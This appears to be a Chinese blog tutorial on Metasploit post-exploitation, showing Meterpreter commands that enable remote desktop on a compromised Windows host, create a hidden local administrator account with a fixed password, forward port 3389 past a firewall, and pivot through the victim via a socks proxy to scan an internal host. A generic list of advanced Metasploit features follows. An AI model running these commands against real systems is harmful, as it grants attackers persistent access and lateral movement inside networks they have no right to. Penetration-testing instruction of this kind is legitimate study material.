metasploit进阶2

25 篇文章 2 订阅
4 篇文章 0 订阅

拿到shell 开启远程终端

开启远程终端 添加账号

getgui 模块——开启远程桌面

run getgui -e #开启目标主机远程桌面

run post/windows/manage/enable_rdp 
run getgui -u myqf -p QWEasd123 添加本地管理员

在这里插入图片描述

转发端口

如果服务器防火墙开启的情况下,有可能拦截远程终端端口,使用命令把远程端口3389转发出来

Usage: portfwd [-h] [add | delete | list | flush] [args]

转发3389端口

命令:

portfwd add -l 1234 -p 3389 -r 受害者主机 
rdesktop 127.0.0.1:1234

在这里插入图片描述
如果不能连接:
参考:https://zhuanlan.zhihu.com/p/371497627

在这里插入图片描述

跨路由访问

参考:内网渗透 psexec

kali无法直接访问目标主机 但是kali获取受害者的权限 得知可以访问目标主机,所以可以通过受害者做跳板访问目标主机

socks 相关设置:

setg Proxies socks4a/5:ip:port #让msf所有模块的流量都通过此代理走。(setg全局设置) 
setg Proxies socks5:192.168.0.189:1080 
set ReverseAllowProxy true #允许反向代理,通过socks反弹shell,建立双向通道。(探测可以不设置此项)

忘记输该命令,run 运行好像也会提示没有输入该命令

利用:

proxychains4 nmap 10.10.10.144 -sT -A -p 445
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Metasploit是一款强大的渗透测试工具,以下是一些进阶用法: 1. 使用自定义Payload:Metasploit默认提供了一些Payload,但你也可以使用自己编写的Payload。可以使用msfvenom生成自定义Payload,并使用msfconsole进行连接和攻击。 2. 使用Exploit模块:Metasploit中有很多Exploit模块,可以使用这些模块来攻击漏洞。可以使用search命令搜索可用的Exploit模块,然后使用use命令选择要使用的模块。 3. 使用Post模块:Post模块可以在攻击成功后执行各种任务,例如收集密码、查找敏感信息等。可以使用search命令搜索可用的Post模块,然后使用use命令选择要使用的模块。 4. 使用Meterpreter会话:Meterpreter是Metasploit中的一种后门程序,可以在攻击成功后建立一个交互式Shell。可以使用sessions命令查看已建立的会话,然后使用session命令进入会话。 5. 使用模块的选项:每个模块都有一些选项,可以使用set命令设置这些选项。例如,可以设置RHOSTS选项指定要攻击的目标主机。 6. 自定义Exploit:如果你无法找到现有的Exploit模块来攻击目标,可以编写自己的Exploit。Metasploit提供了一个模板,可以使用这个模板来编写自己的Exploit。 7. 使用Metasploit Framework API:Metasploit Framework API可以在你的代码中使用Metasploit的功能。这使得你可以编写自己的脚本来使用Metasploit进行渗透测试。 总之,Metasploit是一个非常强大的工具,可以用于各种攻击和渗透测试场景。通过掌握以上进阶用法,你可以更好地利用Metasploit进行渗透测试。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

明月清风~~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值